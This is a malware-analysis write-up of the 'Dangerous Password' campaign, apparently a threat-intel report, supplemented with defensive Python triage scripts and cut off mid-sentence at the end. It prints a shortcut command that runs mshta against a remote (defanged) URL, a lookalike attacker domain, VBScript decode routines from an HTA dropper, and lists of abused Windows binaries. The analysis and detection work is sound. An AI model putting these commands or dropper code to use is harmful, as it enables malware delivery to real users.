## Dangerous Password
## Table of Contents
* [Malware analysis](#Malware-analysis)
* [Cyber kill chain](#Cyber-kill-chain)
* [Indicators Of Compromise (IOC)](#IOC)
* [References MITRE ATT&CK Matrix](#Ref-MITRE-ATTACK)
* [Links](#Links)
+ [Original Tweet](#tweet)
+ [Link Anyrun](#Links-Anyrun)
+ [Articles](#Articles)
<h2>Malware analysis <a name="Malware-analysis"></a></h2>
<h6>The initial vector is an executable RAR archive containing a modified LNK shortcut; the shortcut writes the file to the temp folder and executes the remote code through an mshta call.</h6>
<img src="https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/offshore%20APT%20organization/DangerousPassword/2020-04-02/Pictures/Lnk_File.png">
<table>
<tr>
<td>MachineID</td>
<td>IconFileName</td>
<td>CommandLineArguments</td>
<td>WorkingDirectory</td>
<td>LocalBasePath</td>
<td>TargetFileDOSName</td>
<td>TargetFileSize</td>
<td>CreateDate</td>
<td>ModifyDate</td>
<td>FileAttributes</td>
</tr>
<tr>
<td>desktop-mn3id9</td>
<td>C:\Windows\System32\shell32.dll</td>
<td>/c start /b %SystemRoot%\System32\mshta https[:]//bit.ly/2UiZH6V</td>
<td>C:\Users\Public\Music\</td>
<td>C:\Windows\System32\cmd.exe</td>
<td>cmd.exe</td>
<td>280064</td>
<td>2020-02-14 15:47:41 (+01:00)</td>
<td>2020-02-14 15:47:41 (+01:00)</td>
<td>Archive</td>
</tr>
</table>
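The fields in the table above are what a shortcut-metadata parser hands back, and every one of them is a detection opportunity: a "folder" icon borrowed from shell32.dll, a target of cmd.exe, mshta with a shortener URL in the arguments, a world-writable working directory. The following triage script is an added example for this write-up, not tooling from the original analysis; the field names follow the table, the indicator lists (LOLBINS, SHELL_TARGETS, URL_SHORTENERS) are this example's own assumptions, and the sample record is constructed from the table's values with the URL kept defanged.

```python
"""Triage of shortcut (LNK) metadata of the kind listed in the table above."""
import re
from pathlib import PureWindowsPath

# Built-in Windows binaries that fetch or run remote content when abused from a shortcut
# (this example's own list, not from the original analysis).
LOLBINS = {"mshta", "powershell", "wscript", "cscript", "rundll32", "regsvr32",
           "certutil", "bitsadmin", "msiexec"}
# Interpreters and shells that a document or folder shortcut has no reason to launch.
SHELL_TARGETS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
URL_SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "is.gd", "rebrand.ly"}
# Matches plain and defanged URLs (https[:]//, hxxp://) and captures the host.
URL_RE = re.compile(r"(?:https?|hxxps?)(?:\[:\]|:)//([^\s/\"'>]+)", re.IGNORECASE)

# Constructed from the table above (same values, URL left defanged).
SAMPLE_LNK = {
    "MachineID": "desktop-mn3id9",
    "IconFileName": r"C:\Windows\System32\shell32.dll",
    "CommandLineArguments": r"/c start /b %SystemRoot%\System32\mshta https[:]//bit.ly/2UiZH6V",
    "WorkingDirectory": "C:\\Users\\Public\\Music\\",
    "LocalBasePath": r"C:\Windows\System32\cmd.exe",
    "TargetFileDOSName": "cmd.exe",
    "TargetFileSize": 280064,
    "FileAttributes": "Archive",
}


def extract_hosts(command_line):
    """Return the lower-cased host of every URL (defanged or not) in the argument string."""
    return [host.lower() for host in URL_RE.findall(command_line)]


def triage_lnk(lnk):
    """Return (rule, detail) pairs for each suspicious trait of one LNK metadata record."""
    findings = []
    target = PureWindowsPath(lnk.get("TargetFileDOSName") or lnk.get("LocalBasePath", "")).name.lower()
    args = lnk.get("CommandLineArguments", "")
    tokens = set(re.findall(r"[a-z0-9_.-]+", args.lower()))  # splits on %, \ and /
    hosts = extract_hosts(args)

    if target in SHELL_TARGETS:
        findings.append(("shell_target", f"shortcut launches {target}"))
    for binary in sorted(LOLBINS & tokens):
        findings.append(("lolbin_in_args", f"{binary} invoked from the command line"))
    if hosts:
        findings.append(("remote_content", "command line references " + ", ".join(hosts)))
    for host in hosts:
        if host in URL_SHORTENERS:
            findings.append(("url_shortener", f"{host} hides the final destination"))
    if "start /b" in args.lower():
        findings.append(("hidden_window", "start /b runs the payload without a visible console"))

    icon = PureWindowsPath(lnk.get("IconFileName", "")).name.lower()
    if icon and icon != target and icon.endswith(".dll"):
        findings.append(("icon_masquerade", f"icon taken from {icon}, not from the target"))
    if "\\users\\public\\" in lnk.get("WorkingDirectory", "").lower():
        findings.append(("public_workdir", "working directory is the world-writable Public profile"))
    return findings


def verdict(findings):
    """Rough triage label: a LOLBin plus a remote URL is enough on its own to escalate."""
    rules = {rule for rule, _ in findings}
    if {"lolbin_in_args", "remote_content"} <= rules:
        return "malicious"
    return "suspicious" if len(rules) >= 2 else "clean"


if __name__ == "__main__":
    hits = triage_lnk(SAMPLE_LNK)
    for rule, detail in hits:
        print(f"[{rule}] {detail}")
    print("verdict:", verdict(hits))
```

Run against the table's record, every rule fires and the verdict is "malicious"; a shortcut pointing at notepad.exe with its own icon and no arguments produces no findings. The same checks translate directly into a hunt over LNK files harvested from mail attachments or user profiles.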
<h6>The Bitly link redirects to a fake cloud-storage page that impersonates a legitimate service (.club instead of .fr).</h6>
```html
<html>
<head><title>Bitly</title></head>
<body><a href="http://www.cloudfiles.club:8080/edit?id=T8YJQTVktMp8W%2Bj/W5EvDWglxOnw8evApd1RaERyZzz/Qzh2uXI/OIlDzMTGaoc57qLEkLRpQt5RK8enWJAvRA%3D%3D">moved here</a></body>
</html>
```
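The landing URL carries three traits worth checking automatically: a registrable label copied from a real service under a different TLD, an HTTP listener on a non-default port, and an opaque query parameter that is base64 but not text. The script below is an added example for this write-up, not code from the original analysis. The watch-list LEGIT_SERVICES is this example's assumption: the text only says the .club domain stands in for a .fr one, so "cloudfiles.fr" is inferred from that sentence. The sample URL is the one from the redirect page above.

```python
"""Checks for the landing URL of a lure page such as the fake cloud service above."""
import base64
import binascii
from urllib.parse import parse_qs, urlsplit

LEGIT_SERVICES = {"cloudfiles.fr"}          # assumed watch-list, inferred from ".club instead of .fr"
DEFAULT_PORTS = {"http": 80, "https": 443}

# URL taken from the redirect page shown above.
SAMPLE_URL = ("http://www.cloudfiles.club:8080/edit?id=T8YJQTVktMp8W%2Bj/W5EvDWglxOnw8evApd1RaERyZzz/"
              "Qzh2uXI/OIlDzMTGaoc57qLEkLRpQt5RK8enWJAvRA%3D%3D")


def split_domain(host):
    """Return (registrable label, tld); 'www.cloudfiles.club' -> ('cloudfiles', 'club')."""
    parts = host.lower().rstrip(".").split(".")
    return (parts[-2], parts[-1]) if len(parts) >= 2 else (parts[0], "")


def lookalike_of(host):
    """Return the legitimate domain this host imitates (same label, other TLD), or None."""
    label, tld = split_domain(host)
    for legit in LEGIT_SERVICES:
        legit_label, legit_tld = split_domain(legit)
        if label == legit_label and tld != legit_tld:
            return legit
    return None


def opaque_blob(value):
    """Decode a base64 query value; return the bytes if they are not readable text, else None."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    printable = sum(32 <= b < 127 for b in raw)
    return raw if raw and printable / len(raw) < 0.9 else None


def triage_url(url):
    """Return (rule, detail) pairs describing the suspicious traits of one URL."""
    parts = urlsplit(url)
    host, port = parts.hostname or "", parts.port
    findings = []
    target = lookalike_of(host)
    if target:
        findings.append(("lookalike_domain", f"{host} imitates {target}"))
    if port and port != DEFAULT_PORTS.get(parts.scheme):
        findings.append(("nonstandard_port", f"{parts.scheme} served on port {port}"))
    for key, values in parse_qs(parts.query).items():
        for value in values:
            blob = opaque_blob(value)
            if blob is not None:
                findings.append(("opaque_parameter",
                                 f"{key}= is a {len(blob)}-byte binary blob, not readable text"))
    return findings


if __name__ == "__main__":
    for rule, detail in triage_url(SAMPLE_URL):
        print(f"[{rule}] {detail}")
```

The opaque parameter check deliberately reports only that the value is binary; what the token encodes is not visible from the page and the script does not guess.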
<h6>This executes the following Visual Basic code; the first two functions decode the base64 data and create a stream object to manipulate it.</h6>
```vb
<script language="vbscript">
' dbsc: base64 -> byte array. The MSXML DOM element with DataType "bin.base64"
' decodes the text assigned to .Text and exposes the bytes as .NodeTypedValue.
function dbsc(tds)
with CreateObject("Msxml2.DOMDocument").CreateElement("mic")
.DataType="bin.base64"
.Text=tds
dbsc=appc(.NodeTypedValue)
end with
end function
' appc: byte array -> UTF-8 string. The stream is opened in binary mode (Type=1),
' the bytes are written, then it is switched to text mode (Type=2) and read back.
function appc(ByVal bin)
with CreateObject("ADODB.Stream")
.Type=1
.Open
.Write bin
.Position=0
.Type=2
.CharSet="utf-8"
appc=.ReadText
.Close
end with
end function
```
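For static triage it is often enough to reproduce the decode stage offline rather than let mshta run it: the two functions above are just base64 to bytes to UTF-8 text, and any long base64 literal passed to dbsc is the hidden stage. The following script is an added example for this write-up, not code from the original analysis. It extracts the VBScript blocks of an HTA, lists the COM objects they instantiate (NOTABLE_COM is this example's own annotation list), and decodes long base64 literals the way dbsc/appc would. The sample HTA is constructed here; its encoded payload is a harmless placeholder string.

```python
"""Static triage of an HTA/VBScript dropper of the kind shown above."""
import base64
import re

SCRIPT_BLOCK_RE = re.compile(r'<script[^>]*language\s*=\s*"vbscript"[^>]*>(.*?)</script>',
                             re.IGNORECASE | re.DOTALL)
CREATE_OBJECT_RE = re.compile(r'CreateObject\(\s*"([^"]+)"\s*\)', re.IGNORECASE)
# A quoted literal of 40+ base64 characters is long enough to be a hidden stage, not a label.
B64_LITERAL_RE = re.compile(r'"([A-Za-z0-9+/]{40,}={0,2})"')

# COM objects that usually mean decode / file drop / process launch when seen in an HTA
# (this example's own annotations).
NOTABLE_COM = {
    "msxml2.domdocument": "base64 or hex decoding via DataType=bin.base64",
    "adodb.stream": "write bytes to disk or convert them to text",
    "wscript.shell": "run a command or read environment variables",
    "scripting.filesystemobject": "file system access",
}

# Constructed sample: the two functions from the page plus a call with a placeholder payload.
_PAYLOAD_B64 = base64.b64encode(b"constructed placeholder: next stage would be here").decode()
SAMPLE_HTA = f'''<html><head><title>Bitly</title></head><body>
<script language="vbscript">
function dbsc(tds)
with CreateObject("Msxml2.DOMDocument").CreateElement("mic")
.DataType="bin.base64"
.Text=tds
dbsc=appc(.NodeTypedValue)
end with
end function
function appc(ByVal bin)
with CreateObject("ADODB.Stream")
.Type=1
.Open
.Write bin
.Position=0
.Type=2
.CharSet="utf-8"
appc=.ReadText
.Close
end with
end function
stage = dbsc("{_PAYLOAD_B64}")
</script></body></html>'''


def vbscript_blocks(html):
    """Return the bodies of all <script language="vbscript"> blocks in the document."""
    return SCRIPT_BLOCK_RE.findall(html)


def com_objects(script):
    """Return the ProgIDs passed to CreateObject, lower-cased, in first-seen order."""
    seen = []
    for progid in CREATE_OBJECT_RE.findall(script):
        if progid.lower() not in seen:
            seen.append(progid.lower())
    return seen


def decode_b64_literals(script):
    """Mirror dbsc + appc: base64 literal -> bytes -> UTF-8 text (undecodable bytes replaced)."""
    out = []
    for literal in B64_LITERAL_RE.findall(script):
        try:
            out.append(base64.b64decode(literal).decode("utf-8", errors="replace"))
        except ValueError:
            continue
    return out


def triage_hta(html):
    """Summarise COM usage and recovered hidden text for every VBScript block in an HTA."""
    report = {"blocks": 0, "com_objects": [], "notable": {}, "decoded": []}
    for script in vbscript_blocks(html):
        report["blocks"] += 1
        for progid in com_objects(script):
            if progid not in report["com_objects"]:
                report["com_objects"].append(progid)
            if progid in NOTABLE_COM:
                report["notable"][progid] = NOTABLE_COM[progid]
        report["decoded"].extend(decode_b64_literals(script))
    return report


if __name__ == "__main__":
    for key, value in triage_hta(SAMPLE_HTA).items():
        print(f"{key}: {value}")
```

Because the decode is done in Python, the recovered stage can be inspected and hashed without ever instantiating the COM objects the script asks for; the ProgID list alone is a useful signature for HTA content arriving through mshta.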
<h6>Then it copies a password-protected file into the temp folder and shows it for …